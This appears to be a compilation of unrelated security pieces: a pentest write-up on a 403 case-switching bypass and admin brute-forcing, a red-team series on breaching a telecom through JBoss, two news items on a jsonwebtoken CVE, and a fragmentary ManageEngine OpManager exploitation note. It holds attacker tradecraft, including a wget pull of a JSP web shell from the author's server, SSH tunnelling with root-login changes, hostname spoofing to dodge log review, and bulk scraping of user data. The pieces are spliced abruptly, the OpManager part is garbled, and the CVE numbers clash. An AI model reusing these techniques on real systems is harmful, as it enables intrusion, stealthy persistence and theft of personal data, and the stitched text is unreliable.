Today we’ll look at one of the external penetration tests that I carried out earlier this year. Due to the confidentiality agreement, we will use the usual domain of REDACTED.COM
So, to provide a bit of context to the test, it is completely black box with zero information being provided from the customer. The only thing we know is that we are allowed to test redacted.com and the subdomain my.redacted.com
I’ll skip through the whole passive information gathering process and will get straight to the point.
I start actively scanning and navigating through the website to discover potential entry points. There are no ports open other than 80 & 443.
So, I start directory bruteforcing with gobuster and straightaway, I see an admin panel that returns a 403 — Forbidden response.
gobuster
Seeing this, we navigate to the website to verify that it is indeed a 403 and to capture the request with Burp Suite for potential bypasses.
admin panel — 403
In my mind, I am thinking that it will be impossible to bypass this, because there is an ACL for internal IP addresses. Nevertheless, I tried the following to bypass the 403:
HTTP Methods fuzzing (GET, POST, TRACE, HEAD etc.)
Path fuzzing/force browsing (https://redacted.com/admin/index.html, https://redacted.com/admin/./index.html and more)
Protocol version changing (From HTTP 1.2, downgrade to HTTP 1.1 etc.)
String terminators (%00, 0x00, //, ;, %, !, ?, [] etc.) — adding those to the end of the path and inside the path
Long story short, none of those methods worked. So, I remember that sometimes the security controls are built around the literal spelling and case of components within a request. Therefore, I tried the ‘Case Switching’ technique — probably sounds dumb, but it actually worked!
To sum it up:
https://redacted.com/admin -> 403 Forbidden
https://redacted.com/Admin -> 200 OK
https://redacted.com/aDmin -> 200 OK
Swiching any of the letters to a capital one, will bypass the restriction.
Voila! We get a login page to the admin panel.
admin panel — bypassed 403
We get lucky with this one, nevertheless, we are now able to try different attacks (password spraying, brute forcing etc.). The company that we are testing isn’t small and we had collected quite a large number of employee credentials from leaked databases (leak check, leak peek and others). However, this is the admin panel and therefore we go with the usual tests:
See if there is username enumeration
See if there are any login restrictions
Check for possible WAF that will block us due to number of requests
To keep it short, there is neither. We are unable to enumerate usernames, however there is no rate limiting of any sort.
Considering the above, we load rockyou.txt and start brute forcing the password of the ‘admin’ account. After a few thousand attempts, we see the below:
admin panel brute forcing w/ Burp Suite
We found valid credentials for the admin account. Navigate to the website’s admin panel, authenticate and we are in!
Admin panel — successful authentication
Now that we are in, there isn’t much more that we need to do or can do (without the consent of the customer). The admin panel with administrative privileges allows you to change the whole configuration — control the users & their attributes, control the website’s pages, control everything really. So, I decided to write a Python script that scrapes the whole database of users (around 39,300 — thirty nine thousand and three hundred) that contains their names, emails, phones & addresses. The idea to collect all those details is to then present them to the client (victim) — to show the seriousness of the exploited vulnerabilities. Also, due to the severity of those security weaknesses, we wrote a report the same day for those specific issues, which were fixed within 24 hours.
Ultimately, there wasn’t anything too difficult in the whole exploitation process, however the unusual 403 bypass is really something that I see for the first time and I thought that some of you might weaponize this or add it to your future 403 bypass checklists.
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.
Hi everyone, this is my first post on Medium and I hope you guys enjoy reading it! There is a lot of information that I had to redact because of the sensitive nature of this info. (I’m apologizing in advance 😅 )
Introduction
So there I was doing a Red Team Engagement for a client a while back. I was asked to get inside the network and reach to the Call Data Records (CDRs) for the telecom network. People who don’t know what CDR is, here’s a good explanation for it (shamelessly copied from Wikipedia) —
A call detail record (CDR) is a data record produced by a telephone exchange or other telecommunications equipment that documents the details of a telephone call or other telecommunications transaction (e.g., text message) that passes through that facility or device. The record contains various attributes of the call, such as time, duration, completion status, source number, and destination number.
In all my other engagements, this holds a special place. Getting the initial foothold was way too easy (simple network service exploitation to get RCE) but the issue was with the stable shell.
In this blog post (not a tutorial), I want to share my experience on how I went from a Remote Code Execution (RCE) to proxified internal network scans in a matter of minutes.
Reconnaissance
Every ethical hacker/penetration tester/bug bounty hunter/red teamer knows the importance of Reconnaissance. The phrase “give me six hours to chop down a tree and I will spend the first four sharpening the axe” sits perfectly over here. The more extensively the reconnaissance is done, the better odds for exploitation is.
So for the RTE, the obvious choices for recon were: DNS enumerations, ASN & BGP lookups, some passive recons from multiple search engines, checking out source code repositories such as GitHub, BitBucket, GitLab, etc. for something juicy, doing some OSINT on employees for spear phishing in case there was no RCE found. (Trust me when I say this, fooling an employee to download & execute malicious documents is easy to do but only if you could overcome the obstacles — AVs & Email Spam Filters)
There are just so many sources from where you can recon for a particular organization. In my case, I started off with the DNS enumeration itself.
Fun fact: The wordlist I used has 2.77 million unique DNS records.
Most of the bounty hunters will look for port 80 or 443 for all the sub-domains found. The thing is, sometimes it’s better to perform a full port scan just to be on the safe side. In my case, I found a sub-domain e[REDACTED]-nms.[REDACTED].com.[REDACTED] and after a full port scan, I got some interesting results.
The ports 12000/tcp and 14000/tcp were nothing special but 14100/tcp, let’s just say this was my lucky day!!
J-Fuggin-Boss!!
Remote Code Execution
From here on, everyone who has exploited the infamous JBoss vulnerabilities before knows how things will move forward. For newbies, if you haven’t had the experience with JBoss exploitation, you can check out the following links to help you out with the exploitation:
For JBoss exploitation, you can use Jexboss. There are many methods and exploitation techniques included in the tool and it also covers the Application and Servlet deserializations and Struct2. You can exploit JBoss using Metasploit as well, though I prefer Jexboss.
Continuing with the engagement, once I discovered JBoss, I quickly fired up Jexboss for the exploitation. The tool was easy to use.
As we can see from the above screenshot, the server was vulnerable. Using the JMXInvokerServlet method, I was then able to get the Remote Code Execution on the server. Pretty straight forward exploitation! Right?
You must be thinking, that was no advance level shit, so what’s different about this post?
Patience guys!
Now that I had the foothold, the actual issue arose. Of course like always, once I had the RCE I tried getting a reverse shell.
and I even got a back connection!
However, the shell was not stable and the python process was getting killed after a few seconds. I even tried using other reverse shell one-liner payloads, different common ports, even UDP too, but the result was the same. I also tried reverse_tcp/http/https Metasploit payloads in different forms to get meterpreter connections but the meterpreter shells were disconnected after a few seconds.
I have experienced some situations like these before and I always questioned what if I’m not able to get a reverse shell, how will I proceed?
Entering Bind shell connection over HTTP tunnel!
How I hacked into a Telecom Network — Part 2 (Playing with Tunnels: TCP Tunneling)
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.
Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, now getting issue with the reverse shell.
Now that when I tried getting a stable reverse shell, I failed. The other idea that came to my mind was getting a bind shell (getting SSH over HTTP for stability purpose) instead of reverse over HTTP (TCP Tunnel over HTTP). But what exactly am I achieving here?
TCP Tunnel over HTTP (for TCP stability purpose + Stealthy SSH connection (over TCP Tunnel created) + SOCKS Tunnel (Dynamic SSH Tunnel) for internal network scan using Metasploit = Exploiting internal network service to exfil data via these recursive tunnels.
Looks very complex? Let’s break it down into multiple steps:
First, I created a bridge between my server and the NMS server so that it should support communication for different protocols other than just HTTP/HTTPS(>L2 for now) [TCP Tunnel over HTTP]
Once the bridge (TCP Tunnel over HTTP) was created, I configured and implemented SSH Port Forwarding from my server (2222/tcp) to the NMS server (22/tcp) so that I could connect to the NMS server via SSH over HTTP. (SSH over TCP over HTTP to be precise) Note: The SSH service on the NMS server was running on 127.0.0.1
I then, configured the NMS SSH server to allow root login and generate SSH private key (copy my Public Key to authorized_hosts file) for access to the NMS server via SSH.
I checked SSH connection to NMS using the private key and when it worked, I then created a Dynamic SSH Tunnel (SOCKS) to proxify Metasploit over SSH Tunnel (Metasploit over SSH Tunnel over TCP Tunnel over HTTP to be precise).
I want to blog it step by step on how I created the tunnels and the way I played with them.
Tunneling 101
A tunneling protocol is a communications protocol that allows for the movement of data from one network to another. It involves allowing private network communications to be sent across a public network (such as the Internet) through a process called encapsulation. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, it can hide the nature of the traffic that is run through a tunnel.
The tunneling protocol works by using the data portion of a packet (the payload) to carry the packets that actually provide the service. Tunneling uses a layered protocol model such as those of the OSI or TCP/IP protocol suite, but usually violates the layering when using the payload to carry a service not normally provided by the network. Typically, the delivery protocol operates at an equal or higher level in the layered model than the payload protocol.
Source: Wikipedia
So basically the idea is to use the webserver as an intermediate proxy to forward all the network packets (TCP packets) from the webserver to the internal network.
Forwarding TCP packets to the internal network through the web server using the HTTP protocol
TCP tunneling can help you in situations where you have restricted port access and filtered egress traffic. In my case, there was not much filtering however, I used this technique to get stable shell access.
Now that I already had an RCE on the server and that too with the “root” privilege. I quickly used this opportunity to create a JSP based shell using ABPTTS
A Black Path Toward The Sun (ABPTTS)
As explained in the GitHub repo,
ABPTTS uses a Python client script and a web application server page/package to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server.
Currently, only JSP/WAR and ASP.NET server-side components are supported by this tool.
So the idea was to create a JSP based shell using ABPTTS and upload it to the web server, let the tool connect with the JSP shell, and create a TCP tunnel over HTTP to create a secure shell (SSH) between my system and the server.
python abpttsfactory.py -o jexws4.jsp
When the shell got generated using ABPTTS, the tool created a configuration file to be used for creating the TCP tunnel over HTTP/HTTPS.
I then uploaded the JSP shell to the server using wget. Note: The jexws4.war shell is a package for Jexboss. When you exploit the JBoss vulnerability via Jexboss, the tool will upload its own WAR shell to the server. In my case, I just tried to find this WAR/JSP shell (jexws4.jsp) and replace it with the ABPTTS shell
wget http://[MY SERVER]/jexws4.jsp -O <location of jexws4.jsp shell on NMS server>
Once the ABPTTS shell got uploaded onto the server, I quickly confirmed it on Jexboss by executing a random command to see the output. Why? Now that the Jexboss shell was overwritten by the ABPTTS shell, no matter what command I executed, the output was always the hash printed out due to the ABPTTS shell.
As you can see from the above screenshot, when I executed the “id” command, I got a weird hash in return that proves the ABPTTS shell was uploaded successfully!
Now that I had a TCP tunnel over HTTP configured, the next thing I wanted to do was tunnel the SSH port running on the server (22/tcp on NMS) and bind the port to my system (2222/tcp). Why? so that I could connect to NMS via SSH. Did you notice what I was trying to do here?
SSH port forwarding (not yet tunneled) via TCP tunnel over HTTP
Even though I had yet to configure the SSH part on the NMS and on my own server for the SSH Tunnel. For now, I just prepared the port forwarding mechanism so that I could reach the local port 22/tcp on NMS from my server using port 2222/tcp
I checked my connections table to check if the port is properly forwarded or not. As you can see in the below screenshot, my server’s port 2222/tcp was in the LISTEN state.
The next thing to do now is configuring the SSH server to connect to the NMS and start a Dynamic SSH Tunnel (SOCKS). I’ll cover this in the next post:
How I hacked into a Telecom Network — Part 3 (Playing with Tunnels: Stealthy SSH & Dynamic Tunnels)
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.
Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, implemented TCP tunnel over HTTP for Shell Stability.
DISCLAIMER: This post is quite lengthy so just sit back,be patient and enjoy the ride!
In the previous part, I mentioned the steps I followed and I configured TCP Tunnel over HTTP and SSH port forwarding to access port 22/tcp of NMS server from my server using port 2222/tcp. In this blog post, I’ll show how I implemented SSH Dynamic Tunnels for further network exploitation.
Stealthy SSH Access
When you’re connected to an SSH server, the connection details are saved in a log file. To check these connection details, you can execute the ‘w’ command in *nix systems.
The command w on many Unix-likeoperating systems provides a quick summary of every user logged into a computer, what each user is currently doing, and what load all the activity is imposing on the computer itself. The command is a one-command combination of several other Unix programs: who, uptime, and ps -a. Source: Wikipedia
So basically, the source IP is saved which is dangerous for a red teamer. As this was a RTE, I could not take the chance of letting the admin know about my C2 location. (don’t worry, the ABPTTS shell that I used was connected from my server and I already bought a domain for IDN Homograph attacksto reduce my chances of detection)
For the stealthy connection to work, I checked the hosts file to gather more information and I found that this server is being used quite heavily inside the network.
Such a server was already being monitored so I was thinking of ways to be as stealthy as possible in such a scenario. NMS was already monitoring the network so I thought it must be monitoring itself that includes all the network connections to/from the server. This means I can’t use a normal port scan using the TCP tunnel over HTTP.
How about encrypting the communication between my server and the NMS server using SSH? But for SSH connection, my hostname/IP will be stored in the log files, and also the username would be easy to identify.
In this case, my server’s username was ‘harry’, and generating a key for this user which I’ll store in the authorized_keys file was not a good option.
And then I came up with an Idea (in steps),
Create the user ‘nms’ (this user was already created in the NMS server) on my server.
Change my server’s hostname from OPENVPN to [REDACTED]_NMS[REDACTED]. (the same as the NMS server)
Generate SSH keys for ‘nms’ user on my server and copy the public key in the NMS server. (authorized_keys)
Configure the SSH server running on NMS to enable root login (PermitRootLogin), TCP port forwarding & gateway ports. (SSH -g switch just in case)
Configure the NMS server to act as a SOCKS proxy for my further network exploitation. (Dynamic SSH Tunnel)
The SOCKS tunnel is encrypted now and I can use this tunnel to do an internal network scan using Metasploit.
Implementation time!
I began by first adding the user ‘nms’ on my server so that I could generate the user-specific SSH keys.
I even changed the hostname of my server with the exact same for the NMS server so that when I log in using SSH, the logs will show a user login entry as nms@[REDACTED]_NMS[REDACTED]
Next, I generated the SSH Keys for ‘nms’ user on my server.
I also had to change the SSH configurations on the NMS server so I downloaded the sshd_config file from the server and changed few things inside.
AllowTCPForwarding: This option is used to enable TCP port forwarding via SSH.
GatewayPorts: This option enables the port binding to interfaces other than loopback on remote ports. (I’m enabling this option just in case if I want a reverse shell from other internal systems on this server which will forward the shell to me via Reverse Port Forwarding)
PermitRootLogin: This option permits the client to connect to the SSH server using ‘root’.
StrictModes: This option specifies whether SSH should check the user’s permissions in their home directory before accepting login.
Now that the configuration was done, I quickly uploaded (more like overwrite) the sshd_config file on to the NMS server.
And I also copied the SSH public key to ‘root’ user’s authorized_keys file
After everything was set, I then tried a test connection just to check if I’m able to do SSH using ‘root’ on the NMS server or not!
Booyah! 😎😎😎
SSH over TCP over HTTP (SSH port forward over TCP Tunnel created over HTTP connection via ABPTTS shell (JSP))
Dynamic port forwarding (DPF) is an on-demand method of traversing a firewall or NAT through the use of firewall pinholes. The goal is to enable clients to connect securely to a trusted server that acts as an intermediary for the purpose of sending/receiving data to one or many destination servers.
DPF can be implemented by setting up a local application, such as SSH, as a SOCKS proxy server, which can be used to process data transmissions through the network or over the Internet.
Once the connection is established, DPF can be used to provide additional security for a user connected to an untrusted network. Since data must pass through the secure tunnel to another server before being forwarded to its original destination, the user is protected from packet sniffing that may occur on the LAN.
So all I had to do was create a Dynamic SSH Tunnel so that the NMS server would act as a SOCKS proxy server. Some of the benefits I had for using a SOCKS tunnel:
Got indirect access to other network devices/servers through the NMS server (NMS server becomes the gateway for me)
Because of the Dynamic SSH Tunnel, all the traffic originating from my server to the NMS server got encrypted (usedSSH connection, remember?)
Even if a server admin sits on the NMS server and monitors the network, he won’t be able to exactly find the root cause right away. (A dedicated one would definitely join the dots)
The connection was stable (thanks to HTTP Keep-Alive), now all these recursive tunnels were running smoothly without any connection drop because of the TCP Tunnel that I implemented over HTTP.
When I logged in to the NMS server over SSH, here’s what the ‘w’ command showed me:
Now all I had to do was create the SOCKS tunnel and which I did using the command: ssh -NfCq -D 9090 -i <private key/identity file> <user@host> -p <ssh custom port>
The ‘PermitRootLogin’ was changed in sshd_config file for this purpose (to log in to the NMS server as root).
Worried what the server admin would think about the setup? Generally, when SSH connections are opened, server admin sometimes checks the username that logged in, the authorized keys that were used to log in but most of the time, he checks the hostname/IP from where the connection was initiated.
In my case, I initiated the connection from my server where the address was 127.0.0.1 using port 2222/tcp (thanks to TCP tunnel over HTTP) to the NMS server with destination address as 127.0.0.1 (again!). Now because of this setup, all he would see is a connection initiated by the NMS server to the NMS server SSH using the authorized keys (the public key) stored as user ‘nms’ (that’s why I created the same user on my host to generate the keys) and even if the admin checked the known_hosts file, all he would see is ‘nms@[REDACTED]_NMS[REDACTED]’ user connected to the SSH with IP as 127.0.0.1 which was already a user profile in the NMS server.
To confirm the SOCKS tunnel, I checked the connection table on my server and port 9090/tcp was in the LISTEN state.
Awesome! The SOCKS Tunnel is ready!
All that was left for me was to use the SOCKS tunnel for Metasploit for further network exploitation which I’ll cover in the next post (the final part):
Pro Tip!
When you connect to a server over SSH, a pseudo TTY is automatically allocated. Of course, this doesn’t happen when you’re executing commands via SSH (one-liners). So whenever you want to tunnel through SSH or create a SOCKS tunnel, try the -T switch to disable the pseudo TTY allocation. You can also use the below command:
ssh -NTfCq -L <local port forwarding> <user@host>
ssh -NTfCq -D <Dynamic port forwarding> <user@host>
To check all the SSH switches you can refer to the SSH manual (HIGHLY RECOMMENDED!). When creating a tunnel with the switches (showed above), you can create a tunnel without a TTY allocation and the tunneled port will work just fine!
How I hacked into a Telecom Network — Part 4 (Getting Access to CDRs, SS7 applications & VLRs)
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.
Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, implemented TCP tunnel over HTTP for Shell Stability.
In the previous part (Playing with Tunnels: Stealthy SSH & Dynamic SSH Tunnels), I mentioned the steps I followed to create SSH Tunnels with stealthy SSH access from my server using port 2222/tcp. In this blog post, I’ll show how I used the SOCKS Tunnel for internal network reconnaissance and to exploit internal servers to get access to the CDRs stored in a server.
Situational Awareness (Internal Network)
During the engagement, I was able to create a Dynamic SSH tunnel via TCP tunnel over HTTP, and believe me when I say this, the shell was neat!
Moving forward, I then configured the SOCKS tunnel over port 9090/tcp and then connected proxychains for NMap scans.
Though I prefer Metasploit instead of NMap as it gave me more coverage over scans and I was able to manage the internal IP scans easily with it. To use the proxies for all the modules I used the “setg Proxies socks4:127.0.0.1:9090” command (to set proxy option globally). I looked for internal web servers so I used auxiliary/scanner/http/http_version module.
Because of setg, the Proxies option was already set, now all I needed to do was just give the IP subnet range and run the module.
I found some Remote Management Controllers (iRMC), some SAN switches (switchExplorer.html), and a JBoss Instance …
There’s another JBoss instance used internally? 🤣
Exploiting Internal Network Service
So there was another JBoss Instance running on port 80/tcp on an internal IP 10.x.x.x. So all I had to do was use proxychains and run JexBoss once more on the internal IP (I could have also used -P switch in JexBoss to provide the proxy address).
This was an easy win for me as the internal JBoss server running was also vulnerable and due to that, I was able to get RCE from my pivotal machine (initial foothold machine) to the next internal JBoss server 😎
Awesome! Now, when I got the shell, I used the following command to list down all the files and directories under the /home/<user> location in a structured way:
cd /home/<user> | find . -print | sed -e “s;[^/]*/;|_ _ _ _;g;s;_ _ _ _|; |;g” 2>&1
In the output, I found an interesting .bat file — ss7-cli.bat (The script configures the SS7 Management Shell Bootstrap Environment)
In the same Internal JBoss server, a Visitor Location Register (VLR) console client application was also stored to access the VLR information from the database.
To monitor the SS7/ISDN links and decode the protocol standards and generate CDRs for billing purposes, a console client is required that will interact with the system.
You may ask why there was an SS7 client application running on JBoss? One word — “Mobicents”
Mobicents
Mobicents is an Open Source VoIP Platform written in Java to help create, deploy, manage services and applications integrating voice, video, and data across a range of IP and legacy communications networks. Source: Wikipedia
Mobicents enables the composition of Service Building Blocks (SBB) such as call control, billing, user provisioning, administration, and presence-sensitive features. This makes Mobicents servers an easy choice for telecom Operations Support Systems (OSS) and Network Management Systems (NMS). Source: design.jboss.org
So it looks like the internal JBoss server is running a VoIP gateway application (SIP server) that is interacting with the Public Switched Telephone Network (PSTN) using SS7. (This was tiring to get to know the internal network structure without any kind of network architecture diagram)
Going beyond
While doing some more recon in the internal JBoss application running a VoIP gateway, I found that there were some internal gateway servers, CDR backup databases, FTP servers that stored backup configurations of SS7 and USSD protocol, etc.(Thanks to /etc/hosts)
rom the hosts file, I found a lot of FTP servers which at first I didn’t really felt important but then I found the CDR-S and CDR-L FTP servers. These servers were storing the backup CDR S-Records and CDRL-Recordsrespectively.
You can read more about these records from here: CDR S-Records: Page 157 & CDR L-Records: Page 168
Using Metasploit, I quickly scanned these FTP servers and checked for their authenticated status.
The FTP servers were accessible without any kind of authentication 🤣🤣
Maybe the FTP servers were used for internal use by VoIP applications or something else but still, a win is a win!
Due to this, I was able to get to the CDR backups that were stored in XLS format for almost all the mobile subscribers. (Sorry but I had to redact a lot as these were really critical information)
From the screenshot, A Number is from where the call was originated (the caller) and B Number was the dialed number. The CDR record also included the IMSI & IMEI numbers, Call Start/End Date & Timestamp, Call duration, Call Types (Incoming calling or Outgoing), Service Type (the telecom service companies), Cell ID-A (The Cell Tower from where the call was originated) and Location-A (The location of the caller)
Once our team notified the client regarding our access to the CDR Backup servers, the client asked us to end our engagement there. I guess it was too much for them to take it 🤣
I hope you guys enjoyed it!
Promotion Time!
If you guys want to learn more about the techniques I used and the basic concepts behind it, you can read my books (co-authored with @himanshu_hax)
JWT is short for JSON Web Token, where JSON itself is short for JavaScript Object Notation.
JSON is a modernish way of representing structured data; its format is a bit like XML, and can often be used instead, but without all the opening-and-closing angle brackets to get in the way of legibility.
For example, data that might be recorded like this in XML…
Whether the JSON really is easier to read than the XML is an open question, but the big idea of JSON is that because the data is encoded as legal JavaScript source, albeit without any directly or indirectly executable code in it, you can parse and process it using your existing JavaScript engine, like this:
The output string undefined above merely reflects the fact that console.log() is a procedure – a function that does some work but doesn’t return a value. The word Sophos is printed out as a side-effect of calling the function, while undefined denotes what the function calculated and sent back: nothing.
The popularity of JavaScript for both in-browser and server-side programming, plus the visual familiarity of JSON to JavaScript coders, means that JSON is widely used these days, especially when exchanging structured data between web clients and servers.
And one popular use of JSON is the JWT system, which isn’t (officially, at any rate) read aloud as juh-witt, as it is written, but peculiarly pronounced jot, an English word that is sometimes used to refer the little dot we write above above an
i
or
j
, and that refers to a tiny but potentially important detail.
Authenticate strongly, then get a temporary token
Loosely speaking, a JWT is a blob of encoded data that is used by many cloud servers as a service access token.
The idea is that you start by proving your identity to the service, for example by providing a username, password and 2FA code, and you get back a JWT.
The JWT sent back to you is a blob of base64-encoded (actually, URL64-encoded) data that includes three fields:
Which crytographic algorithm was used in constructing the JWT.
What sort of access the JWT grants, and for how long.
A keyed cryptographic hash of the first two fields, using a secret key known only to your service provider.
Once you’ve authenticated up front, you can make subsequent requests to the online service, for example to check a product price or to look up an email address in a database, simply by including the JWT in each request, using it as a sort-of temporary access card.
Clearly, if someone steals your JWT after it’s been issued, they can play it back to the relevant server, which will typically give them access instead of you…
…but JWTs don’t need to be saved to disk, usually have a limited lifetime, and are sent and received over HTTPS connections, so that they can’t (in theory at least) easily be sniffed out or stolen.
When JWTs expire, or if they are cancelled for security reasons by the server, you need to go through the full-blown authentication process again in order to re-establish your right to access the service.
But for as long they’re valid, JWTs improve performance because they avoid the need to reauthenticate fully for every online request you want to make – rather like session cookies that are set in your browser while you’re logged into a social network or a news site.
Security validation as infiltration
Well, cybersecurity news today is full of a revelation by researchers at Palo Alto that we’ve variously seen described as a “high-severity flaw” or a “critical security flaw” in a popular JWT implementation.
In theory, at least, this bug could be exploited by cybercriminals for attacks ranging from implanting unauthorised files onto a JWT server, thus maliciously modifying its configuration or modifying the code it might later use, to direct and immediate code execution inside a victim’s network.
Simply put, the act of presenting a JWT to a back-end server for validation – something that typically happens at every API call (jargon for making a service request) – could lead malware being implanted.
But here’s the good news:
The flaw isn’t intrinsic to the JWT protocol. It applies to a specific implementation of JWT called
from 8.5.1 or earlier to version 9.0.0, which came out on 2022-12-21, you’re now protected from this particular vulnerability.
Cybercriminals can’t directly exploit the bug simply by logging in and making API calls. As far as we can see, although an attacker could subsequently trigger the vulnerability by making remote API requests, the bug needs to be “primed” first by deliberately writing a booby-trapped secret key into your authentication server’s key-store.
According to the researchers, the bug existed in the part of Auth0’s code that validated incoming JWTs against the secret key stored centrally for that user.
As mentioned above, the JWT itself consists of two fields of data denoting your access privileges, and a third field consisting of the first two fields hashed using a secret key known only to the service you’re calling.
To validate the token, the server needs to recalculate the keyed hash of those first two JWT fields, and to confirm the hash that you presented matches the hash it just calculated.
Given that you don’t know the secret key, but you can present a hash that was computed recently using that key…
…the server can infer that you must have acquired the hash from the authentication server in the first place, by proving your identity up front in some suitable way.
Data type confusion
It turns out that the hash validation code in
jsonwebtoken
assumes (or, until recently, assumed) that the secret key for your account in the server’s own authentication key-store really was a cryptographic secret key, encoded in a standard text-based format such as PEM (short for privacy enhanced mail, but mainly used for non-email purposes these days).
If you could somehow corrupt a user’s secret key by replacing it with data that wasn’t in PEM format, but that was, in fact, some other more complex sort of JavaScript data object…
…then you could booby-trap the secret-key-based hash validation calculation by tricking the authentication server into running some JavaScript code of your choice from that infiltrated “fake key”.
Simply put, the server would try to decode a secret key that it assumed was in a format it could handle safely, even if the key wasn’t in a safe format and the server couldn’t deal with it securely.
Note, however, that you’d pretty much need to hack into the secret key-store database first, before any sort of truly remote code execution trigger would be possible.
And if attackers are already able to wander around your network to the point that they can not only poke their noses into but also modify your JWT secret-key database, you’ve probably got bigger problems than CVE-2022-23539, as this bug has been designated.
However, if you’ve now patched but you think crooks might realistically have been able to pull off this sort of JWT attack on your network, patching alone isn’t enough.
In other words, if you think you might have been at risk here, don’t just patch and move on.
Use threat detection and response techniques to look for holes by which cybercriminals could get far enough to attack your network more generally…
…and make sure you don’t have crooks in your network anyway, even after applying the patch.
The open-source jsonwebtoken (JWT) library is affected by a high-severity security flaw that could lead to remote code execution.
The open-source JsonWebToken (JWT) library is affected by a high-severity security flaw, tracked as CVE-2022-23529 (CVSS score: 7.6), that could lead to remote code execution.
The package is maintained by Auth0, it had over 9 million weekly downloads as of January 2022 and it is used by more than 22.000 projects.
The flaw was discovered by Unit 42 researchers, it can be exploited by threat actors by tricking a server into verifying a maliciously crafted JSON web token (JWT) request.
“By exploiting this vulnerability, attackers could achieve remote code execution (RCE) on a server verifying a maliciously crafted JSON web token (JWT) request.” reads the advisory published by Palo Alto Networks.“With that being said, in order to exploit the vulnerability described in this post and control the secretOrPublicKey value, an attacker will need to exploit a flaw within the secret management process.”
JsonWebToken is an open-source JavaScript package that allows users to verify/sign JSON web tokens (JWT).
The flaw impacts JsonWebToken package version 8.5.1 or an earlier version, the JsonWebToken package version 9.0.0 addressed the issue.
“For versions <=8.5.1 of jsonwebtoken library, if a malicious actor has the ability to modify the key retrieval parameter (referring to the secretOrPublicKey argument from the readme link) of the jwt.verify() function, they can gain remote code execution (RCE).” reads the advisory published on GitHub.“You are affected only if you allow untrusted entities to modify the key retrieval parameter of the jwt.verify() on a host that you control.”
Vulnerabilities in open-source projects are very dangerous, threat actors could exploit them as part of supply chain attacks that can impact any projects relying on them.
“Open source projects are commonly used as the backbone of many services and platforms today. This is also true for the implementation of sensitive security mechanisms such as JWTs, which play a huge role in authentication and authorization processes.” concludes Palo Alto. “Security awareness is crucial when using open source software. Reviewing commonly used security open source implementations is necessary for maintaining their dependability, and it’s something the open source community can take part in.”
Below is the timeline for this vulnerability:
July 13, 2022 – Unit 42 researchers sent a disclosure to the Auth0 team under responsible disclosure procedures
July 27, 2022 – Auth0 team updated that the issue was under review
Aug. 23, 2022 – Unit 42 researchers sent an update request
Aug. 24, 2022 – Auth0 team updated that the engineering team was working on the resolution
Dec. 21, 2022 – A patch was provided by the Auth0 engineering team
Write a class directly to call the decrypt function
cryptTag is
<strong>EnDecryptUtil.getCryptTag()</strong>
obtained by
Parse the persistence-configurations.xml file to get the CryptTag attribute and view the file content
Attempt to
<strong>MLITE_ENCRYPT_DECRYPT</strong>
decrypt unsuccessfully, and then found that an external entity was introduced at the top of the xml file
Finally
<strong>conf\customer-config.xml</strong>
found the CryptTag in the file
The algorithm is AES256. After decryption, link to the database and check the AaaLogin table.
The domainName is obtained
<strong>-</strong>
, and the final request package is as follows
Get restapi from this
The rce method looked at the restapi documentation. There is a workflow that can be used for rce, but there is a problem with accessing through restapi.
an internal api, the isAPIClient in the session will only be assigned when you log in, so this place isApiclient is false, and NmsUtil.isRMMEdition is false, causing an exception to be thrown
APIError.internalAPI(request, response)
. then all internal apis cannot be called.
The
conf\OpManager\do\RestApi.xml
key APIs that define the workflow are
<strong><em>EXPOSED_API=TRUE</em></strong>
the internal APIs.
At this point, the rce is broken. I traced back the
isInternalAPI()
function and found that all the APIs are in the database
, a total of 955 APIs can be accessed through restapi.
I looked at it and saw that nothing was added, deleted, modified, and checked. I hope someone who is destined can dig out a rce.
Replenish
My colleague looked at the cve injected by the other two commands of opmanager and found that it should be possible to string rce together. see colleagues’ articles
The writing is rubbish, the wording is frivolous, the content is simple, and the operation is unfamiliar. The deficiencies are welcome to give pointers and corrections from the masters, and I am grateful.
CVE-2022-36923 Detail
Current Description
Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user’s API key, and then access external APIs.
Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user’s API key, and then access external APIs.